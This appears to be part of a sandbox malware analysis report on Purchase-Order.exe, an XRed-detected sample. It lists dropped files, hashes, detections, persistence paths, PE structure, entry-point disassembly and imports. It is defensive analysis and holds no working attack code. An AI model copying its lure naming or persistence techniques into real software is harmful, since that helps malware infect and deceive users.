                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0CaSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ha+pAZewRDK4mW
                                                                                                              MD5:D49D5254761356A02D8E072F9A55FC5C
                                                                                                              SHA1:C9ED0A61A0C0FC14AD4AA0A1771D5A2A61C6DA3C
                                                                                                              SHA-256:3109A63EDB82E83D078E8016559683DA4A28AFB800C660963B8B042174D9C59C
                                                                                                              SHA-512:2E06B35C3A0CBA87A3E4A32FB5A79EE7EB6662980B96E49D0B9D79A95D4B77F18DF2E2142B30D9CE32D26F4BC6E44A02A5F031378468ED7F0849EEF3B55082AC
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uGkpkQkzoKyp7oHUyiUEIQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.263319868016921
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0HSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                              MD5:0CF1240BB3A6AB076E17D1947F8CDB0E
                                                                                                              SHA1:93F22A72056E5F4F454ACB495164F431F8F15CF8
                                                                                                              SHA-256:7763E12F980002F2D1182448EE4902D6D0D7E4884924F2227E74C8AD9F1BF3D4
                                                                                                              SHA-512:01CAA1D1D8422C2C294BCAFD085683396E093B40706608D0B1888B2E92A85B44279E3C3357558378886F42233CE6D7E754D2328E638FAAD5A3CB12F77386DDAF
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p9wnIWfa1KPBiI2yw8eVSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.259566574109022
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0OGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+LG+pAZewRDK4mW
                                                                                                              MD5:EFF503A141AA92D97A17A5A287149CC0
                                                                                                              SHA1:E3DFEAF42BFD27265078E92C05F5FAA46CD91B96
                                                                                                              SHA-256:9DAA113165C7C0F14AE8F57FC66A6FE72ED8CE1ADA88E4E385A11C6AD8137F94
                                                                                                              SHA-512:C876D01C493F16ADDA5EDB71BACE1F95FF7D66C1F2F8DF7D41B5918564A8DD7EFE928AF3ED04E4BEDB7E31DC9F0E77216528AB7844FB530BA06D45A6AE82637A
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kwSpfq97byMV-L59td4sWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\Users\user\Desktop\._cache_Purchase-Order.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:35:46 2024, mtime=Mon Dec 30 09:35:46 2024, atime=Mon Dec 30 09:35:46 2024, length=1433600, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1805
                                                                                                              Entropy (8bit):3.428861357731731
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:8FAL9Jb3L7+o/eqenW+xAexgM3rE2+s9T4IlgzBm:8EnLp/ank+br9MIl8
                                                                                                              MD5:B6B64D21C54C67F20C7D5FBD2BF696E3
                                                                                                              SHA1:B94B67F67FE3FE6B73BFBE1A9AF62AC7F1A8DE09
                                                                                                              SHA-256:C015E756032E918CC841B19742467BACC4F6878DF3F75EF945A22D0952AD5B67
                                                                                                              SHA-512:0919861F862EFC1DA5ADB00DCE7BAAC6333E0A9439C22DDFAA6823911A1675443C036BBCFB2F336E6AD29344FC0ABC7068E18FFD0548BF516E03A2C91E363020
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ....3.Z../....Z../....Z............................:..DG..Yr?.D..U..k0.&...&......vk.v....=...Z.......Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.YvT...........................%..A.p.p.D.a.t.a...B.V.1......YsT..Roaming.@......CW.^.YsT...........................!..R.o.a.m.i.n.g.....V.1......YwT..Windata.@......YwT.YwT..............................W.i.n.d.a.t.a.....`.2......YxT .OJTLMJ.exe..F......YxT.YxT....i.........................O.J.T.L.M.J...e.x.e.......`...............-......._.............~......C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.O.J.T.L.M.J...e.x.e.).".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...............................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\._cache_Purchase-Order.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1433600
                                                                                                              Entropy (8bit):7.206229660873325
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:s4lavt0LkLL9IMixoEgealA0LDRcj2sihc/S2sVRdnTyVdq9MmCS:7kwkn9IMHealA0Rcj2sdS2CFAaPCS
                                                                                                              MD5:5C99BB8A6972F6FCE154D00AA56F2F9D
                                                                                                              SHA1:858EA7DA6E49971E4912D4086425FD13A3939FE5
                                                                                                              SHA-256:80DFD89D85F7614654C487906AC90B5EDAE84535ECD6E8EC10C9F42C2A1BF4F5
                                                                                                              SHA-512:3409EA0C42887C91A778CB9D2A7BBAC1047610C146639BEE5C57D7A2F28E3510122B57DE942EA29DC717581C1FFF90294CC0DBAFF3EFE925DCFCA441EE01D523
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 58%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...T.ag.........."..................k............@..........................@......(.....@...@.......@.....................lk..|....@...K...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc....K...@...L..................@..@.reloc..b............:..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\Purchase-Order.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1433600
                                                                                                              Entropy (8bit):7.206229660873325
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:s4lavt0LkLL9IMixoEgealA0LDRcj2sihc/S2sVRdnTyVdq9MmCS:7kwkn9IMHealA0Rcj2sdS2CFAaPCS
                                                                                                              MD5:5C99BB8A6972F6FCE154D00AA56F2F9D
                                                                                                              SHA1:858EA7DA6E49971E4912D4086425FD13A3939FE5
                                                                                                              SHA-256:80DFD89D85F7614654C487906AC90B5EDAE84535ECD6E8EC10C9F42C2A1BF4F5
                                                                                                              SHA-512:3409EA0C42887C91A778CB9D2A7BBAC1047610C146639BEE5C57D7A2F28E3510122B57DE942EA29DC717581C1FFF90294CC0DBAFF3EFE925DCFCA441EE01D523
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 58%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...T.ag.........."..................k............@..........................@......(.....@...@.......@.....................lk..|....@...K...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc....K...@...L..................@..@.reloc..b............:..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                              Category:dropped
                                                                                                              Size (bytes):18387
                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                              Malicious:false
                                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):165
                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                              MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                              SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                              SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                              SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                              Malicious:false
                                                                                                              Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):771584
                                                                                                              Entropy (8bit):6.638013190381294
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                              MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                              SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                              SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.057045739046609
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 92.57%
                                                                                                              • Win32 Executable Borland Delphi 7 (665061/41) 6.16%
                                                                                                              • Windows ActiveX control (116523/4) 1.08%
                                                                                                              • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                              File name:Purchase-Order.exe
                                                                                                              File size:2'205'184 bytes
                                                                                                              MD5:63a057389438a0b287d32e31149d6ad4
                                                                                                              SHA1:f2114dea9d348008317751d413bdf5d4fc047513
                                                                                                              SHA256:1150fc6830ed3e383726e18b447d840f62f74b30d072291762a70d6c7600cb45
                                                                                                              SHA512:a2caba5e5e38c282e224a1b381bfa7ce140ab018b118c4fbd224d9444c4380a664131b35b21d05aab5b041683a3095a33b442b288505a75d93989d4a1ddbd096
                                                                                                              SSDEEP:49152:hnsHyjtk2MYC5GDfkwkn9IMHealA0Rcj2sdS2CFAaPCSO:hnsmtk2aBdnV94212CRPCt
                                                                                                              TLSH:E3A5C062B3D58172C173563AAC37A752AC3BBE191D34B54F3FE42E1DAE31342151A2A3
                                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                              Icon Hash:2eec8e8cb683b9b1
                                                                                                              Entrypoint:0x49ab80
                                                                                                              Entrypoint Section:CODE
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                              DLL Characteristics:
                                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              add esp, FFFFFFF0h
                                                                                                              mov eax, 0049A778h
                                                                                                              call 00007FCE74B1173Dh
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              call 00007FCE74B65085h
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, 0049ABE0h
                                                                                                              call 00007FCE74B64C84h
                                                                                                              mov ecx, dword ptr [0049DBDCh]
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, dword ptr [00496590h]
                                                                                                              call 00007FCE74B65074h
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              call 00007FCE74B650E8h
                                                                                                              call 00007FCE74B0F21Bh
                                                                                                              add byte ptr [eax], al
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x16fd30.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xb00000x16fd300x16fe00302eb354210128e2f62b7dc122912db9False0.642175288820931data7.159034819635589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                              RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                              RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                              RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                              RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                              RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                              RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                              RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                              RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                              RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                              RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                              RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                              RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                              RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                              RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                              RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                              RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                              RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                              RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.36350844277673544
                                                                                                              RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                              RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                              RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                              RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                              RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                              RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                              RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                              RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                              RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                              RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                              RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                              RT_STRING0xb67b80xdcdata0.6
                                                                                                              RT_STRING0xb68940x320data0.45125
                                                                                                              RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                              RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                              RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                              RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                              RT_STRING0xb74040x378data0.41103603603603606
                                                                                                              RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                              RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                              RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                              RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                              RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                              RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                              RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                              RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                              RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                              RT_RCDATA0xb8e040x10data1.5
                                                                                                              RT_RCDATA0xb8e140x15e000PE32 executable (GUI) Intel 80386, for MS Windows0.5394821166992188
                                                                                                              RT_RCDATA0x216e140x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                              RT_RCDATA0x216e180x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                              RT_RCDATA0x21aa180x64cdata0.5998759305210918
                                                                                                              RT_RCDATA0x21b0640x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                              RT_RCDATA0x21b1b80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                              RT_GROUP_CURSOR0x21f98c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                              RT_GROUP_CURSOR0x21f9a00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                              RT_GROUP_CURSOR0x21f9b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_CURSOR0x21f9c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_CURSOR0x21f9dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_CURSOR0x21f9f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_CURSOR0x21fa040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                              RT_GROUP_ICON0x21fa180x14dataTurkishTurkey1.1
                                                                                                              RT_VERSION0x21fa2c0x304dataTurkishTurkey0.42875647668393785
                                                                                                              DLLImport
                                                                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                              advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
